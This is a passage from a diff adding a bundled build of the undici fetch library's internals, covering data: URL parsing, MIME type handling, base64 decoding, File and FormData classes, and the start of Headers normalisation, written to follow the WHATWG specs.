dataURLProcessor (dataURL) { + // 1. Assert: dataURL’s scheme is "data". + assert(dataURL.protocol === 'data:') + + // 2. Let input be the result of running the URL + // serializer on dataURL with exclude fragment + // set to true. + let input = URLSerializer(dataURL, true) + + // 3. Remove the leading "data:" string from input. + input = input.slice(5) + + // 4. Let position point at the start of input. + const position = { position: 0 } + + // 5. Let mimeType be the result of collecting a + // sequence of code points that are not equal + // to U+002C (,), given position. + let mimeType = collectASequenceOfCodePointsFast( + ',', + input, + position + ) + + // 6. Strip leading and trailing ASCII whitespace + // from mimeType. + // Undici implementation note: we need to store the + // length because if the mimetype has spaces removed, + // the wrong amount will be sliced from the input in + // step #9 + const mimeTypeLength = mimeType.length + mimeType = removeASCIIWhitespace(mimeType, true, true) + + // 7. If position is past the end of input, then + // return failure + if (position.position >= input.length) { + return 'failure' + } + + // 8. Advance position by 1. + position.position++ + + // 9. Let encodedBody be the remainder of input. + const encodedBody = input.slice(mimeTypeLength + 1) + + // 10. Let body be the percent-decoding of encodedBody. + let body = stringPercentDecode(encodedBody) + + // 11. If mimeType ends with U+003B (;), followed by + // zero or more U+0020 SPACE, followed by an ASCII + // case-insensitive match for "base64", then: + if (/;(\u0020){0,}base64$/i.test(mimeType)) { + // 1. Let stringBody be the isomorphic decode of body. + const stringBody = isomorphicDecode(body) + + // 2. Set body to the forgiving-base64 decode of + // stringBody. + body = forgivingBase64(stringBody) + + // 3. If body is failure, then return failure. + if (body === 'failure') { + return 'failure' + } + + // 4. Remove the last 6 code points from mimeType. 
+ mimeType = mimeType.slice(0, -6) + + // 5. Remove trailing U+0020 SPACE code points from mimeType, + // if any. + mimeType = mimeType.replace(/(\u0020)+$/, '') + + // 6. Remove the last U+003B (;) code point from mimeType. + mimeType = mimeType.slice(0, -1) + } + + // 12. If mimeType starts with U+003B (;), then prepend + // "text/plain" to mimeType. + if (mimeType.startsWith(';')) { + mimeType = 'text/plain' + mimeType + } + + // 13. Let mimeTypeRecord be the result of parsing + // mimeType. + let mimeTypeRecord = parseMIMEType(mimeType) + + // 14. If mimeTypeRecord is failure, then set + // mimeTypeRecord to text/plain;charset=US-ASCII. + if (mimeTypeRecord === 'failure') { + mimeTypeRecord = parseMIMEType('text/plain;charset=US-ASCII') + } + + // 15. Return a new data: URL struct whose MIME + // type is mimeTypeRecord and body is body. + // https://fetch.spec.whatwg.org/#data-url-struct + return { mimeType: mimeTypeRecord, body } +} + +// https://url.spec.whatwg.org/#concept-url-serializer +/** + * @param {URL} url + * @param {boolean} excludeFragment + */ +function URLSerializer (url, excludeFragment = false) { + if (!excludeFragment) { + return url.href + } + + const href = url.href + const hashLength = url.hash.length + + return hashLength === 0 ? href : href.substring(0, href.length - hashLength) +} + +// https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points +/** + * @param {(char: string) => boolean} condition + * @param {string} input + * @param {{ position: number }} position + */ +function collectASequenceOfCodePoints (condition, input, position) { + // 1. Let result be the empty string. + let result = '' + + // 2. While position doesn’t point past the end of input and the + // code point at position within input meets the condition condition: + while (position.position < input.length && condition(input[position.position])) { + // 1. Append that code point to the end of result. + result += input[position.position] + + // 2. 
Advance position by 1. + position.position++ + } + + // 3. Return result. + return result +} + +/** + * A faster collectASequenceOfCodePoints that only works when comparing a single character. + * @param {string} char + * @param {string} input + * @param {{ position: number }} position + */ +function collectASequenceOfCodePointsFast (char, input, position) { + const idx = input.indexOf(char, position.position) + const start = position.position + + if (idx === -1) { + position.position = input.length + return input.slice(start) + } + + position.position = idx + return input.slice(start, position.position) +} + +// https://url.spec.whatwg.org/#string-percent-decode +/** @param {string} input */ +function stringPercentDecode (input) { + // 1. Let bytes be the UTF-8 encoding of input. + const bytes = encoder.encode(input) + + // 2. Return the percent-decoding of bytes. + return percentDecode(bytes) +} + +// https://url.spec.whatwg.org/#percent-decode +/** @param {Uint8Array} input */ +function percentDecode (input) { + // 1. Let output be an empty byte sequence. + /** @type {number[]} */ + const output = [] + + // 2. For each byte byte in input: + for (let i = 0; i < input.length; i++) { + const byte = input[i] + + // 1. If byte is not 0x25 (%), then append byte to output. + if (byte !== 0x25) { + output.push(byte) + + // 2. Otherwise, if byte is 0x25 (%) and the next two bytes + // after byte in input are not in the ranges + // 0x30 (0) to 0x39 (9), 0x41 (A) to 0x46 (F), + // and 0x61 (a) to 0x66 (f), all inclusive, append byte + // to output. + } else if ( + byte === 0x25 && + !/^[0-9A-Fa-f]{2}$/i.test(String.fromCharCode(input[i + 1], input[i + 2])) + ) { + output.push(0x25) + + // 3. Otherwise: + } else { + // 1. Let bytePoint be the two bytes after byte in input, + // decoded, and then interpreted as hexadecimal number. + const nextTwoBytes = String.fromCharCode(input[i + 1], input[i + 2]) + const bytePoint = Number.parseInt(nextTwoBytes, 16) + + // 2. 
Append a byte whose value is bytePoint to output. + output.push(bytePoint) + + // 3. Skip the next two bytes in input. + i += 2 + } + } + + // 3. Return output. + return Uint8Array.from(output) +} + +// https://mimesniff.spec.whatwg.org/#parse-a-mime-type +/** @param {string} input */ +function parseMIMEType (input) { + // 1. Remove any leading and trailing HTTP whitespace + // from input. + input = removeHTTPWhitespace(input, true, true) + + // 2. Let position be a position variable for input, + // initially pointing at the start of input. + const position = { position: 0 } + + // 3. Let type be the result of collecting a sequence + // of code points that are not U+002F (/) from + // input, given position. + const type = collectASequenceOfCodePointsFast( + '/', + input, + position + ) + + // 4. If type is the empty string or does not solely + // contain HTTP token code points, then return failure. + // https://mimesniff.spec.whatwg.org/#http-token-code-point + if (type.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(type)) { + return 'failure' + } + + // 5. If position is past the end of input, then return + // failure + if (position.position > input.length) { + return 'failure' + } + + // 6. Advance position by 1. (This skips past U+002F (/).) + position.position++ + + // 7. Let subtype be the result of collecting a sequence of + // code points that are not U+003B (;) from input, given + // position. + let subtype = collectASequenceOfCodePointsFast( + ';', + input, + position + ) + + // 8. Remove any trailing HTTP whitespace from subtype. + subtype = removeHTTPWhitespace(subtype, false, true) + + // 9. If subtype is the empty string or does not solely + // contain HTTP token code points, then return failure. + if (subtype.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(subtype)) { + return 'failure' + } + + const typeLowercase = type.toLowerCase() + const subtypeLowercase = subtype.toLowerCase() + + // 10. 
Let mimeType be a new MIME type record whose type + // is type, in ASCII lowercase, and subtype is subtype, + // in ASCII lowercase. + // https://mimesniff.spec.whatwg.org/#mime-type + const mimeType = { + type: typeLowercase, + subtype: subtypeLowercase, + /** @type {Map} */ + parameters: new Map(), + // https://mimesniff.spec.whatwg.org/#mime-type-essence + essence: `${typeLowercase}/${subtypeLowercase}` + } + + // 11. While position is not past the end of input: + while (position.position < input.length) { + // 1. Advance position by 1. (This skips past U+003B (;).) + position.position++ + + // 2. Collect a sequence of code points that are HTTP + // whitespace from input given position. + collectASequenceOfCodePoints( + // https://fetch.spec.whatwg.org/#http-whitespace + char => HTTP_WHITESPACE_REGEX.test(char), + input, + position + ) + + // 3. Let parameterName be the result of collecting a + // sequence of code points that are not U+003B (;) + // or U+003D (=) from input, given position. + let parameterName = collectASequenceOfCodePoints( + (char) => char !== ';' && char !== '=', + input, + position + ) + + // 4. Set parameterName to parameterName, in ASCII + // lowercase. + parameterName = parameterName.toLowerCase() + + // 5. If position is not past the end of input, then: + if (position.position < input.length) { + // 1. If the code point at position within input is + // U+003B (;), then continue. + if (input[position.position] === ';') { + continue + } + + // 2. Advance position by 1. (This skips past U+003D (=).) + position.position++ + } + + // 6. If position is past the end of input, then break. + if (position.position > input.length) { + break + } + + // 7. Let parameterValue be null. + let parameterValue = null + + // 8. If the code point at position within input is + // U+0022 ("), then: + if (input[position.position] === '"') { + // 1. 
Set parameterValue to the result of collecting + // an HTTP quoted string from input, given position + // and the extract-value flag. + parameterValue = collectAnHTTPQuotedString(input, position, true) + + // 2. Collect a sequence of code points that are not + // U+003B (;) from input, given position. + collectASequenceOfCodePointsFast( + ';', + input, + position + ) + + // 9. Otherwise: + } else { + // 1. Set parameterValue to the result of collecting + // a sequence of code points that are not U+003B (;) + // from input, given position. + parameterValue = collectASequenceOfCodePointsFast( + ';', + input, + position + ) + + // 2. Remove any trailing HTTP whitespace from parameterValue. + parameterValue = removeHTTPWhitespace(parameterValue, false, true) + + // 3. If parameterValue is the empty string, then continue. + if (parameterValue.length === 0) { + continue + } + } + + // 10. If all of the following are true + // - parameterName is not the empty string + // - parameterName solely contains HTTP token code points + // - parameterValue solely contains HTTP quoted-string token code points + // - mimeType’s parameters[parameterName] does not exist + // then set mimeType’s parameters[parameterName] to parameterValue. + if ( + parameterName.length !== 0 && + HTTP_TOKEN_CODEPOINTS.test(parameterName) && + (parameterValue.length === 0 || HTTP_QUOTED_STRING_TOKENS.test(parameterValue)) && + !mimeType.parameters.has(parameterName) + ) { + mimeType.parameters.set(parameterName, parameterValue) + } + } + + // 12. Return mimeType. + return mimeType +} + +// https://infra.spec.whatwg.org/#forgiving-base64-decode +/** @param {string} data */ +function forgivingBase64 (data) { + // 1. Remove all ASCII whitespace from data. + data = data.replace(/[\u0009\u000A\u000C\u000D\u0020]/g, '') // eslint-disable-line + + // 2. If data’s code point length divides by 4 leaving + // no remainder, then: + if (data.length % 4 === 0) { + // 1. 
If data ends with one or two U+003D (=) code points, + // then remove them from data. + data = data.replace(/=?=$/, '') + } + + // 3. If data’s code point length divides by 4 leaving + // a remainder of 1, then return failure. + if (data.length % 4 === 1) { + return 'failure' + } + + // 4. If data contains a code point that is not one of + // U+002B (+) + // U+002F (/) + // ASCII alphanumeric + // then return failure. + if (/[^+/0-9A-Za-z]/.test(data)) { + return 'failure' + } + + const binary = atob(data) + const bytes = new Uint8Array(binary.length) + + for (let byte = 0; byte < binary.length; byte++) { + bytes[byte] = binary.charCodeAt(byte) + } + + return bytes +} + +// https://fetch.spec.whatwg.org/#collect-an-http-quoted-string +// tests: https://fetch.spec.whatwg.org/#example-http-quoted-string +/** + * @param {string} input + * @param {{ position: number }} position + * @param {boolean?} extractValue + */ +function collectAnHTTPQuotedString (input, position, extractValue) { + // 1. Let positionStart be position. + const positionStart = position.position + + // 2. Let value be the empty string. + let value = '' + + // 3. Assert: the code point at position within input + // is U+0022 ("). + assert(input[position.position] === '"') + + // 4. Advance position by 1. + position.position++ + + // 5. While true: + while (true) { + // 1. Append the result of collecting a sequence of code points + // that are not U+0022 (") or U+005C (\) from input, given + // position, to value. + value += collectASequenceOfCodePoints( + (char) => char !== '"' && char !== '\\', + input, + position + ) + + // 2. If position is past the end of input, then break. + if (position.position >= input.length) { + break + } + + // 3. Let quoteOrBackslash be the code point at position within + // input. + const quoteOrBackslash = input[position.position] + + // 4. Advance position by 1. + position.position++ + + // 5. 
If quoteOrBackslash is U+005C (\), then: + if (quoteOrBackslash === '\\') { + // 1. If position is past the end of input, then append + // U+005C (\) to value and break. + if (position.position >= input.length) { + value += '\\' + break + } + + // 2. Append the code point at position within input to value. + value += input[position.position] + + // 3. Advance position by 1. + position.position++ + + // 6. Otherwise: + } else { + // 1. Assert: quoteOrBackslash is U+0022 ("). + assert(quoteOrBackslash === '"') + + // 2. Break. + break + } + } + + // 6. If the extract-value flag is set, then return value. + if (extractValue) { + return value + } + + // 7. Return the code points from positionStart to position, + // inclusive, within input. + return input.slice(positionStart, position.position) +} + +/** + * @see https://mimesniff.spec.whatwg.org/#serialize-a-mime-type + */ +function serializeAMimeType (mimeType) { + assert(mimeType !== 'failure') + const { parameters, essence } = mimeType + + // 1. Let serialization be the concatenation of mimeType’s + // type, U+002F (/), and mimeType’s subtype. + let serialization = essence + + // 2. For each name → value of mimeType’s parameters: + for (let [name, value] of parameters.entries()) { + // 1. Append U+003B (;) to serialization. + serialization += ';' + + // 2. Append name to serialization. + serialization += name + + // 3. Append U+003D (=) to serialization. + serialization += '=' + + // 4. If value does not solely contain HTTP token code + // points or value is the empty string, then: + if (!HTTP_TOKEN_CODEPOINTS.test(value)) { + // 1. Precede each occurence of U+0022 (") or + // U+005C (\) in value with U+005C (\). + value = value.replace(/(\\|")/g, '\\$1') + + // 2. Prepend U+0022 (") to value. + value = '"' + value + + // 3. Append U+0022 (") to value. + value += '"' + } + + // 5. Append value to serialization. + serialization += value + } + + // 3. Return serialization. 
+ return serialization +} + +/** + * @see https://fetch.spec.whatwg.org/#http-whitespace + * @param {string} char + */ +function isHTTPWhiteSpace (char) { + return char === '\r' || char === '\n' || char === '\t' || char === ' ' +} + +/** + * @see https://fetch.spec.whatwg.org/#http-whitespace + * @param {string} str + */ +function removeHTTPWhitespace (str, leading = true, trailing = true) { + let lead = 0 + let trail = str.length - 1 + + if (leading) { + for (; lead < str.length && isHTTPWhiteSpace(str[lead]); lead++); + } + + if (trailing) { + for (; trail > 0 && isHTTPWhiteSpace(str[trail]); trail--); + } + + return str.slice(lead, trail + 1) +} + +/** + * @see https://infra.spec.whatwg.org/#ascii-whitespace + * @param {string} char + */ +function isASCIIWhitespace (char) { + return char === '\r' || char === '\n' || char === '\t' || char === '\f' || char === ' ' +} + +/** + * @see https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace + */ +function removeASCIIWhitespace (str, leading = true, trailing = true) { + let lead = 0 + let trail = str.length - 1 + + if (leading) { + for (; lead < str.length && isASCIIWhitespace(str[lead]); lead++); + } + + if (trailing) { + for (; trail > 0 && isASCIIWhitespace(str[trail]); trail--); + } + + return str.slice(lead, trail + 1) +} + +module.exports = { + dataURLProcessor, + URLSerializer, + collectASequenceOfCodePoints, + collectASequenceOfCodePointsFast, + stringPercentDecode, + parseMIMEType, + collectAnHTTPQuotedString, + serializeAMimeType +} + + +/***/ }), + +/***/ 8511: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Blob, File: NativeFile } = __nccwpck_require__(4300) +const { types } = __nccwpck_require__(3837) +const { kState } = __nccwpck_require__(5861) +const { isBlobLike } = __nccwpck_require__(2538) +const { webidl } = __nccwpck_require__(1744) +const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) +const { 
kEnumerableProperty } = __nccwpck_require__(3983) +const encoder = new TextEncoder() + +class File extends Blob { + constructor (fileBits, fileName, options = {}) { + // The File constructor is invoked with two or three parameters, depending + // on whether the optional dictionary parameter is used. When the File() + // constructor is invoked, user agents must run the following steps: + webidl.argumentLengthCheck(arguments, 2, { header: 'File constructor' }) + + fileBits = webidl.converters['sequence'](fileBits) + fileName = webidl.converters.USVString(fileName) + options = webidl.converters.FilePropertyBag(options) + + // 1. Let bytes be the result of processing blob parts given fileBits and + // options. + // Note: Blob handles this for us + + // 2. Let n be the fileName argument to the constructor. + const n = fileName + + // 3. Process FilePropertyBag dictionary argument by running the following + // substeps: + + // 1. If the type member is provided and is not the empty string, let t + // be set to the type dictionary member. If t contains any characters + // outside the range U+0020 to U+007E, then set t to the empty string + // and return from these substeps. + // 2. Convert every character in t to ASCII lowercase. + let t = options.type + let d + + // eslint-disable-next-line no-labels + substep: { + if (t) { + t = parseMIMEType(t) + + if (t === 'failure') { + t = '' + // eslint-disable-next-line no-labels + break substep + } + + t = serializeAMimeType(t).toLowerCase() + } + + // 3. If the lastModified member is provided, let d be set to the + // lastModified dictionary member. If it is not provided, set d to the + // current date and time represented as the number of milliseconds since + // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). + d = options.lastModified + } + + // 4. Return a new File object F such that: + // F refers to the bytes byte sequence. + // F.size is set to the number of total bytes in bytes. + // F.name is set to n. 
+ // F.type is set to t. + // F.lastModified is set to d. + + super(processBlobParts(fileBits, options), { type: t }) + this[kState] = { + name: n, + lastModified: d, + type: t + } + } + + get name () { + webidl.brandCheck(this, File) + + return this[kState].name + } + + get lastModified () { + webidl.brandCheck(this, File) + + return this[kState].lastModified + } + + get type () { + webidl.brandCheck(this, File) + + return this[kState].type + } +} + +class FileLike { + constructor (blobLike, fileName, options = {}) { + // TODO: argument idl type check + + // The File constructor is invoked with two or three parameters, depending + // on whether the optional dictionary parameter is used. When the File() + // constructor is invoked, user agents must run the following steps: + + // 1. Let bytes be the result of processing blob parts given fileBits and + // options. + + // 2. Let n be the fileName argument to the constructor. + const n = fileName + + // 3. Process FilePropertyBag dictionary argument by running the following + // substeps: + + // 1. If the type member is provided and is not the empty string, let t + // be set to the type dictionary member. If t contains any characters + // outside the range U+0020 to U+007E, then set t to the empty string + // and return from these substeps. + // TODO + const t = options.type + + // 2. Convert every character in t to ASCII lowercase. + // TODO + + // 3. If the lastModified member is provided, let d be set to the + // lastModified dictionary member. If it is not provided, set d to the + // current date and time represented as the number of milliseconds since + // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). + const d = options.lastModified ?? Date.now() + + // 4. Return a new File object F such that: + // F refers to the bytes byte sequence. + // F.size is set to the number of total bytes in bytes. + // F.name is set to n. + // F.type is set to t. + // F.lastModified is set to d. 
+ + this[kState] = { + blobLike, + name: n, + type: t, + lastModified: d + } + } + + stream (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.stream(...args) + } + + arrayBuffer (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.arrayBuffer(...args) + } + + slice (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.slice(...args) + } + + text (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.text(...args) + } + + get size () { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.size + } + + get type () { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.type + } + + get name () { + webidl.brandCheck(this, FileLike) + + return this[kState].name + } + + get lastModified () { + webidl.brandCheck(this, FileLike) + + return this[kState].lastModified + } + + get [Symbol.toStringTag] () { + return 'File' + } +} + +Object.defineProperties(File.prototype, { + [Symbol.toStringTag]: { + value: 'File', + configurable: true + }, + name: kEnumerableProperty, + lastModified: kEnumerableProperty +}) + +webidl.converters.Blob = webidl.interfaceConverter(Blob) + +webidl.converters.BlobPart = function (V, opts) { + if (webidl.util.Type(V) === 'Object') { + if (isBlobLike(V)) { + return webidl.converters.Blob(V, { strict: false }) + } + + if ( + ArrayBuffer.isView(V) || + types.isAnyArrayBuffer(V) + ) { + return webidl.converters.BufferSource(V, opts) + } + } + + return webidl.converters.USVString(V, opts) +} + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.BlobPart +) + +// https://www.w3.org/TR/FileAPI/#dfn-FilePropertyBag +webidl.converters.FilePropertyBag = webidl.dictionaryConverter([ + { + key: 'lastModified', + converter: webidl.converters['long long'], + get defaultValue () { + return Date.now() + } + }, + { + key: 'type', + converter: webidl.converters.DOMString, + defaultValue: '' + }, + { 
+ key: 'endings', + converter: (value) => { + value = webidl.converters.DOMString(value) + value = value.toLowerCase() + + if (value !== 'native') { + value = 'transparent' + } + + return value + }, + defaultValue: 'transparent' + } +]) + +/** + * @see https://www.w3.org/TR/FileAPI/#process-blob-parts + * @param {(NodeJS.TypedArray|Blob|string)[]} parts + * @param {{ type: string, endings: string }} options + */ +function processBlobParts (parts, options) { + // 1. Let bytes be an empty sequence of bytes. + /** @type {NodeJS.TypedArray[]} */ + const bytes = [] + + // 2. For each element in parts: + for (const element of parts) { + // 1. If element is a USVString, run the following substeps: + if (typeof element === 'string') { + // 1. Let s be element. + let s = element + + // 2. If the endings member of options is "native", set s + // to the result of converting line endings to native + // of element. + if (options.endings === 'native') { + s = convertLineEndingsNative(s) + } + + // 3. Append the result of UTF-8 encoding s to bytes. + bytes.push(encoder.encode(s)) + } else if ( + types.isAnyArrayBuffer(element) || + types.isTypedArray(element) + ) { + // 2. If element is a BufferSource, get a copy of the + // bytes held by the buffer source, and append those + // bytes to bytes. + if (!element.buffer) { // ArrayBuffer + bytes.push(new Uint8Array(element)) + } else { + bytes.push( + new Uint8Array(element.buffer, element.byteOffset, element.byteLength) + ) + } + } else if (isBlobLike(element)) { + // 3. If element is a Blob, append the bytes it represents + // to bytes. + bytes.push(element) + } + } + + // 3. Return bytes. + return bytes +} + +/** + * @see https://www.w3.org/TR/FileAPI/#convert-line-endings-to-native + * @param {string} s + */ +function convertLineEndingsNative (s) { + // 1. Let native line ending be be the code point U+000A LF. + let nativeLineEnding = '\n' + + // 2. 
If the underlying platform’s conventions are to + // represent newlines as a carriage return and line feed + // sequence, set native line ending to the code point + // U+000D CR followed by the code point U+000A LF. + if (process.platform === 'win32') { + nativeLineEnding = '\r\n' + } + + return s.replace(/\r?\n/g, nativeLineEnding) +} + +// If this function is moved to ./util.js, some tools (such as +// rollup) will warn about circular dependencies. See: +// https://github.com/nodejs/undici/issues/1629 +function isFileLike (object) { + return ( + (NativeFile && object instanceof NativeFile) || + object instanceof File || ( + object && + (typeof object.stream === 'function' || + typeof object.arrayBuffer === 'function') && + object[Symbol.toStringTag] === 'File' + ) + ) +} + +module.exports = { File, FileLike, isFileLike } + + +/***/ }), + +/***/ 2015: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { isBlobLike, toUSVString, makeIterator } = __nccwpck_require__(2538) +const { kState } = __nccwpck_require__(5861) +const { File: UndiciFile, FileLike, isFileLike } = __nccwpck_require__(8511) +const { webidl } = __nccwpck_require__(1744) +const { Blob, File: NativeFile } = __nccwpck_require__(4300) + +/** @type {globalThis['File']} */ +const File = NativeFile ?? UndiciFile + +// https://xhr.spec.whatwg.org/#formdata +class FormData { + constructor (form) { + if (form !== undefined) { + throw webidl.errors.conversionFailed({ + prefix: 'FormData constructor', + argument: 'Argument 1', + types: ['undefined'] + }) + } + + this[kState] = [] + } + + append (name, value, filename = undefined) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.append' }) + + if (arguments.length === 3 && !isBlobLike(value)) { + throw new TypeError( + "Failed to execute 'append' on 'FormData': parameter 2 is not of type 'Blob'" + ) + } + + // 1. Let value be value if given; otherwise blobValue. 
+ + name = webidl.converters.USVString(name) + value = isBlobLike(value) + ? webidl.converters.Blob(value, { strict: false }) + : webidl.converters.USVString(value) + filename = arguments.length === 3 + ? webidl.converters.USVString(filename) + : undefined + + // 2. Let entry be the result of creating an entry with + // name, value, and filename if given. + const entry = makeEntry(name, value, filename) + + // 3. Append entry to this’s entry list. + this[kState].push(entry) + } + + delete (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.delete' }) + + name = webidl.converters.USVString(name) + + // The delete(name) method steps are to remove all entries whose name + // is name from this’s entry list. + this[kState] = this[kState].filter(entry => entry.name !== name) + } + + get (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.get' }) + + name = webidl.converters.USVString(name) + + // 1. If there is no entry whose name is name in this’s entry list, + // then return null. + const idx = this[kState].findIndex((entry) => entry.name === name) + if (idx === -1) { + return null + } + + // 2. Return the value of the first entry whose name is name from + // this’s entry list. + return this[kState][idx].value + } + + getAll (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.getAll' }) + + name = webidl.converters.USVString(name) + + // 1. If there is no entry whose name is name in this’s entry list, + // then return the empty list. + // 2. Return the values of all entries whose name is name, in order, + // from this’s entry list. 
+ return this[kState] + .filter((entry) => entry.name === name) + .map((entry) => entry.value) + } + + has (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.has' }) + + name = webidl.converters.USVString(name) + + // The has(name) method steps are to return true if there is an entry + // whose name is name in this’s entry list; otherwise false. + return this[kState].findIndex((entry) => entry.name === name) !== -1 + } + + set (name, value, filename = undefined) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.set' }) + + if (arguments.length === 3 && !isBlobLike(value)) { + throw new TypeError( + "Failed to execute 'set' on 'FormData': parameter 2 is not of type 'Blob'" + ) + } + + // The set(name, value) and set(name, blobValue, filename) method steps + // are: + + // 1. Let value be value if given; otherwise blobValue. + + name = webidl.converters.USVString(name) + value = isBlobLike(value) + ? webidl.converters.Blob(value, { strict: false }) + : webidl.converters.USVString(value) + filename = arguments.length === 3 + ? toUSVString(filename) + : undefined + + // 2. Let entry be the result of creating an entry with name, value, and + // filename if given. + const entry = makeEntry(name, value, filename) + + // 3. If there are entries in this’s entry list whose name is name, then + // replace the first such entry with entry and remove the others. + const idx = this[kState].findIndex((entry) => entry.name === name) + if (idx !== -1) { + this[kState] = [ + ...this[kState].slice(0, idx), + entry, + ...this[kState].slice(idx + 1).filter((entry) => entry.name !== name) + ] + } else { + // 4. Otherwise, append entry to this’s entry list. 
+ this[kState].push(entry) + } + } + + entries () { + webidl.brandCheck(this, FormData) + + return makeIterator( + () => this[kState].map(pair => [pair.name, pair.value]), + 'FormData', + 'key+value' + ) + } + + keys () { + webidl.brandCheck(this, FormData) + + return makeIterator( + () => this[kState].map(pair => [pair.name, pair.value]), + 'FormData', + 'key' + ) + } + + values () { + webidl.brandCheck(this, FormData) + + return makeIterator( + () => this[kState].map(pair => [pair.name, pair.value]), + 'FormData', + 'value' + ) + } + + /** + * @param {(value: string, key: string, self: FormData) => void} callbackFn + * @param {unknown} thisArg + */ + forEach (callbackFn, thisArg = globalThis) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.forEach' }) + + if (typeof callbackFn !== 'function') { + throw new TypeError( + "Failed to execute 'forEach' on 'FormData': parameter 1 is not of type 'Function'." + ) + } + + for (const [key, value] of this) { + callbackFn.apply(thisArg, [value, key, this]) + } + } +} + +FormData.prototype[Symbol.iterator] = FormData.prototype.entries + +Object.defineProperties(FormData.prototype, { + [Symbol.toStringTag]: { + value: 'FormData', + configurable: true + } +}) + +/** + * @see https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#create-an-entry + * @param {string} name + * @param {string|Blob} value + * @param {?string} filename + * @returns + */ +function makeEntry (name, value, filename) { + // 1. Set name to the result of converting name into a scalar value string. + // "To convert a string into a scalar value string, replace any surrogates + // with U+FFFD." + // see: https://nodejs.org/dist/latest-v18.x/docs/api/buffer.html#buftostringencoding-start-end + name = Buffer.from(name).toString('utf8') + + // 2. If value is a string, then set value to the result of converting + // value into a scalar value string. 
+ if (typeof value === 'string') { + value = Buffer.from(value).toString('utf8') + } else { + // 3. Otherwise: + + // 1. If value is not a File object, then set value to a new File object, + // representing the same bytes, whose name attribute value is "blob" + if (!isFileLike(value)) { + value = value instanceof Blob + ? new File([value], 'blob', { type: value.type }) + : new FileLike(value, 'blob', { type: value.type }) + } + + // 2. If filename is given, then set value to a new File object, + // representing the same bytes, whose name attribute is filename. + if (filename !== undefined) { + /** @type {FilePropertyBag} */ + const options = { + type: value.type, + lastModified: value.lastModified + } + + value = (NativeFile && value instanceof NativeFile) || value instanceof UndiciFile + ? new File([value], filename, options) + : new FileLike(value, filename, options) + } + } + + // 4. Return an entry whose name is name and whose value is value. + return { name, value } +} + +module.exports = { FormData } + + +/***/ }), + +/***/ 1246: +/***/ ((module) => { + +"use strict"; + + +// In case of breaking changes, increase the version +// number to avoid conflicts. 
+const globalOrigin = Symbol.for('undici.globalOrigin.1') + +function getGlobalOrigin () { + return globalThis[globalOrigin] +} + +function setGlobalOrigin (newOrigin) { + if (newOrigin === undefined) { + Object.defineProperty(globalThis, globalOrigin, { + value: undefined, + writable: true, + enumerable: false, + configurable: false + }) + + return + } + + const parsedURL = new URL(newOrigin) + + if (parsedURL.protocol !== 'http:' && parsedURL.protocol !== 'https:') { + throw new TypeError(`Only http & https urls are allowed, received ${parsedURL.protocol}`) + } + + Object.defineProperty(globalThis, globalOrigin, { + value: parsedURL, + writable: true, + enumerable: false, + configurable: false + }) +} + +module.exports = { + getGlobalOrigin, + setGlobalOrigin +} + + +/***/ }), + +/***/ 554: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// https://github.com/Ethan-Arrowood/undici-fetch + + + +const { kHeadersList, kConstruct } = __nccwpck_require__(2785) +const { kGuard } = __nccwpck_require__(5861) +const { kEnumerableProperty } = __nccwpck_require__(3983) +const { + makeIterator, + isValidHeaderName, + isValidHeaderValue +} = __nccwpck_require__(2538) +const { webidl } = __nccwpck_require__(1744) +const assert = __nccwpck_require__(9491) + +const kHeadersMap = Symbol('headers map') +const kHeadersSortedMap = Symbol('headers map sorted') + +/** + * @param {number} code + */ +function isHTTPWhiteSpaceCharCode (code) { + return code === 0x00a || code === 0x00d || code === 0x009 || code === 0x020 +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-header-value-normalize + * @param {string} potentialValue + */ +function headerValueNormalize (potentialValue) { + // To normalize a byte sequence potentialValue, remove + // any leading and trailing HTTP whitespace bytes from + // potentialValue. 
+ let i = 0; let j = potentialValue.length + + while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(j - 1))) --j + while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(i))) ++i + + return i === 0 && j === potentialValue.length ? potentialValue : potentialValue.substring(i, j) +} + +function fill (headers, object) { + // To fill a Headers object headers with a given object object, run these steps: + + // 1. If object is a sequence, then for each header in object: + // Note: webidl conversion to array has already been done. + if (Array.isArray(object)) { + for (let i = 0; i < object.length; ++i) { + const header = object[i] + // 1. If header does not contain exactly two items, then throw a TypeError. + if (header.length !== 2) { + throw webidl.errors.exception({ + header: 'Headers constructor', + message: `expected name/value pair to be length 2, found ${header.length}.` + }) + } + + // 2. Append (header’s first item, header’s second item) to headers. + appendHeader(headers, header[0], header[1]) + } + } else if (typeof object === 'object' && object !== null) { + // Note: null should throw + + // 2. Otherwise, object is a record, then for each key → value in object, + // append (key, value) to headers + const keys = Object.keys(object) + for (let i = 0; i < keys.length; ++i) { + appendHeader(headers, keys[i], 